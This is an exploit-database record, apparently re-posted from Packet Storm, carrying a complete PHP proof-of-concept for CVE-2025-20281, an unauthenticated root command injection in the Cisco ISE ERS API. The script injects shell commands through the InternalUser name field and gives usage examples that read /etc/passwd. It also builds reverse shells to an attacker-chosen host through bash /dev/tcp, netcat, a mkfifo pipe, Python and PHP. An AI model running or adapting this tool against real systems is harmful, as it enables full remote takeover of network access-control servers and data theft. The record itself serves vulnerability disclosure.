{“lastseen”:”2025-11-27T17:52:17″,”description”:”Proof of concept exploit for a command injection vulnerability in Cisco ISE API version 3.0…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Cisco ISE API 3.0 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212153″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-20281″],”sourceData”:”=============================================================================================================================================\\n | # Title : Cisco ISE API 3.0 command injection Exploits |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.cisco.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212002\/ \\u0026 \\tCVE-2025-20281\\n \\n \\n [+] Summary : \\n \\n CVE-2025-20281 is a critical unauthenticated remote code execution vulnerability in Cisco Identity Services Engine (ISE) ERS API. \\n \\t The vulnerability allows attackers to execute arbitrary system commands as root without any authentication by exploiting command injection in the InternalUser name field.\\n \\t The vulnerability exists in the ERS (External RESTful Services) API of Cisco ISE where user input in the InternalUser name field is improperly sanitized before being processed. \\n \\t Attackers can inject system commands through crafted payloads that are executed with root privileges on the underlying operating system.\\n \\n [+] POC :\\n \\n Examples:\\n \\n Primary Use:\\n \\n # Vulnerability Testing\\n \\n php cisco_ise_exploit.php –whoami 192.168.1.100\\n \\n # Executing a Custom Command\\n \\n php cisco_ise_exploit.php –cmd \\”id\\” 192.168.1.100\\n \\n # Connectivity Testing Only\\n \\n php cisco_ise_exploit.php –test 192.168.1.100\\n \\n Reverse Shell:\\n \\n # Creating a Reverse Shell\\n \\n php cisco_ise_exploit.php –reverse 10.0.0.50 4444 192.168.1.100\\n \\n # With SSL Verification\\n \\n php cisco_ise_exploit.php –reverse 10.0.0.50 4444 –verify-ssl 192.168.1.100\\n \\n Advanced Commands:\\n \\n # Extract System Information\\n \\n php cisco_ise_exploit.php –cmd \\”uname -a\\” 192.168.1.100\\n \\n # Display Users\\n \\n php cisco_ise_exploit.php –cmd \\”cat \/etc\/passwd\\” 192.168.1.100\\n \\n # Scan Network\\n \\n php cisco_ise_exploit.php –cmd \\”ifconfig\\” 192.168.1.100\\n \\n \\n \\u003c?php\\n \/**\\n * Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS\\n * by indoushka\\n * \\n * Exploits unauthenticated RCE in Cisco ISE ERS API through command injection\\n * in the InternalUser name field.\\n *\/\\n \\n class CiscoISEExploit {\\n private $target;\\n private $verify_ssl;\\n \\n public function __construct($target, $verify_ssl = false) {\\n $this-\\u003etarget = $target;\\n $this-\\u003everify_ssl = $verify_ssl;\\n }\\n \\n private function makeRequest($url, $payload) {\\n $ch = curl_init();\\n \\n $options = [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e json_encode($payload),\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e [\\n ‘Content-Type: application\/json’,\\n ‘User-Agent: Cisco-ISE-Exploit\/1.0’\\n ],\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everify_ssl,\\n CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everify_ssl ? 2 : 0\\n ];\\n \\n curl_setopt_array($ch, $options);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error) {\\n throw new Exception(\\”cURL error: \\” . $error);\\n }\\n \\n return [\\n ‘status’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response\\n ];\\n }\\n \\n public function exploit($cmd) {\\n $url = \\”https:\/\/{$this-\\u003etarget}:9060\/ers\/sdk#_\\”;\\n \/\/ Alternative URL if needed:\\n \/\/ $url = \\”https:\/\/{$this-\\u003etarget}\/ers\/sdk#_\\”;\\n \\n $payload = [\\n \\”InternalUser\\” =\\u003e [\\n \\”name\\” =\\u003e \\”pwn; {$cmd}; #\\”,\\n \\”password\\” =\\u003e \\”x\\”, \/\/ dummy value, ignored by vulnerability\\n \\”changePassword\\” =\\u003e false\\n ]\\n ];\\n \\n echo \\”[*] Sending payload to: {$url}\\\\n\\”;\\n echo \\”[*] Command: {$cmd}\\\\n\\\\n\\”;\\n \\n try {\\n $response = $this-\\u003emakeRequest($url, $payload);\\n echo \\”[+] HTTP {$response[‘status’]}\\\\n\\”;\\n echo \\”Response:\\\\n{$response[‘body’]}\\\\n\\”;\\n \\n return $response;\\n } catch (Exception $e) {\\n echo \\”[!] Exploit failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n public function buildReverseShell($lhost, $lport) {\\n \/\/ Multiple reverse shell options for compatibility\\n $shells = [\\n \/\/ Bash reverse shell\\n \\”\/bin\/bash -c ‘\/bin\/bash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261’\\”,\\n \\n \/\/ Netcat traditional\\n \\”nc -e \/bin\/bash {$lhost} {$lport}\\”,\\n \\n \/\/ Netcat with -e support\\n \\”rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2\\u003e\\u00261|nc {$lhost} {$lport} \\u003e\/tmp\/f\\”,\\n \\n \/\/ Python reverse shell\\n \\”python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{$lhost}\\\\\\”,{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’\\”,\\n \\n \/\/ PHP reverse shell\\n \\”php -r ‘\\\\$s=fsockopen(\\\\\\”{$lhost}\\\\\\”,{$lport});exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”\\n ];\\n \\n \/\/ Return bash reverse shell by default (most reliable)\\n return $shells[0];\\n }\\n \\n public function testConnection() {\\n $url = \\”https:\/\/{$this-\\u003etarget}:9060\/ers\/sdk\\”;\\n echo \\”[*] Testing connection to: {$url}\\\\n\\”;\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 5,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_NOBODY =\\u003e true \/\/ HEAD request\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($http_code \\u003e 0) {\\n echo \\”[+] Target is reachable (HTTP {$http_code})\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[!] Target is not reachable\\\\n\\”;\\n return false;\\n }\\n }\\n }\\n \\n function showBanner() {\\n echo \\”=== CVE-2025-20281 Cisco ISE Unauthenticated RCE Exploit ===\\\\n\\”;\\n echo \\”=== PHP Version – Unauthenticated Command Injection ===\\\\n\\\\n\\”;\\n }\\n \\n function showHelp() {\\n echo \\”Usage: php cisco_ise_exploit.php [OPTIONS] \\u003ctarget\\u003e\\\\n\\\\n\\”;\\n echo \\”Arguments:\\\\n\\”;\\n echo \\” \\u003ctarget\\u003e IP address or hostname of Cisco ISE PAN\\\\n\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” –whoami Run ‘whoami’ command to test RCE\\\\n\\”;\\n echo \\” –reverse LHOST LPORT Spawn reverse shell to LHOST:LPORT\\\\n\\”;\\n echo \\” –cmd COMMAND Execute custom command\\\\n\\”;\\n echo \\” –test Test connection to target only\\\\n\\”;\\n echo \\” –verify-ssl Enable SSL certificate verification\\\\n\\”;\\n echo \\” –help Show this help message\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php cisco_ise_exploit.php –whoami 192.168.1.100\\\\n\\”;\\n echo \\” php cisco_ise_exploit.php –reverse 10.0.0.50 4444 192.168.1.100\\\\n\\”;\\n echo \\” php cisco_ise_exploit.php –cmd ‘id’ 192.168.1.100\\\\n\\”;\\n echo \\” php cisco_ise_exploit.php –test 192.168.1.100\\\\n\\”;\\n }\\n \\n function parseArguments($argv) {\\n $options = [\\n ‘target’ =\\u003e null,\\n ‘whoami’ =\\u003e false,\\n ‘reverse’ =\\u003e null,\\n ‘cmd’ =\\u003e null,\\n ‘test’ =\\u003e false,\\n ‘verify_ssl’ =\\u003e false,\\n ‘help’ =\\u003e false\\n ];\\n \\n \/\/ Simple argument parsing\\n for ($i = 1; $i \\u003c count($argv); $i++) {\\n switch ($argv[$i]) {\\n case ‘–whoami’:\\n $options[‘whoami’] = true;\\n break;\\n case ‘–reverse’:\\n if ($i + 2 \\u003c count($argv)) {\\n $options[‘reverse’] = [$argv[$i + 1], $argv[$i + 2]];\\n $i += 2;\\n }\\n break;\\n case ‘–cmd’:\\n if ($i + 1 \\u003c count($argv)) {\\n $options[‘cmd’] = $argv[$i + 1];\\n $i += 1;\\n }\\n break;\\n case ‘–test’:\\n $options[‘test’] = true;\\n break;\\n case ‘–verify-ssl’:\\n $options[‘verify_ssl’] = true;\\n break;\\n case ‘–help’:\\n $options[‘help’] = true;\\n break;\\n default:\\n \/\/ Assume this is the target if it doesn’t start with –\\n if (!str_starts_with($argv[$i], ‘–‘)) {\\n $options[‘target’] = $argv[$i];\\n }\\n break;\\n }\\n }\\n \\n return $options;\\n }\\n \\n \/\/ Main execution\\n if (php_sapi_name() === ‘cli’) {\\n showBanner();\\n \\n $options = parseArguments($argv);\\n \\n if ($options[‘help’] || !$options[‘target’]) {\\n showHelp();\\n exit(0);\\n }\\n \\n $exploit = new CiscoISEExploit($options[‘target’], $options[‘verify_ssl’]);\\n \\n \/\/ Test connection only\\n if ($options[‘test’]) {\\n $exploit-\\u003etestConnection();\\n exit(0);\\n }\\n \\n \/\/ Determine command to execute\\n $cmd = ”;\\n if ($options[‘whoami’]) {\\n $cmd = ‘whoami’;\\n } elseif ($options[‘reverse’]) {\\n list($lhost, $lport) = $options[‘reverse’];\\n $cmd = $exploit-\\u003ebuildReverseShell($lhost, $lport);\\n echo \\”[*] Reverse shell payload generated for {$lhost}:{$lport}\\\\n\\”;\\n } elseif ($options[‘cmd’]) {\\n $cmd = $options[‘cmd’];\\n } else {\\n echo \\”[!] No command specified. Use –whoami, –reverse, or –cmd\\\\n\\”;\\n showHelp();\\n exit(1);\\n }\\n \\n echo \\”[*] Target: {$options[‘target’]}\\\\n\\”;\\n echo \\”[*] Command: {$cmd}\\\\n\\\\n\\”;\\n \\n \/\/ Execute exploit\\n $result = $exploit-\\u003eexploit($cmd);\\n \\n if ($result) {\\n echo \\”\\\\n[+] Exploit attempt completed.\\\\n\\”;\\n \\n if ($options[‘reverse’]) {\\n echo \\”[*] Check your listener for reverse shell connection\\\\n\\”;\\n }\\n } else {\\n echo \\”\\\\n[!] Exploit failed.\\\\n\\”;\\n exit(1);\\n }\\n \\n } else {\\n echo \\”This script must be run from the command line.\\\\n\\”;\\n exit(1);\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212153″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212153\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-27T17:52:17″,”description”:”Proof of concept exploit for a command injection vulnerability in Cisco ISE API version 3.0…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Cisco ISE API 3.0 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212153″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-20281″],”sourceData”:”=============================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-27863","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n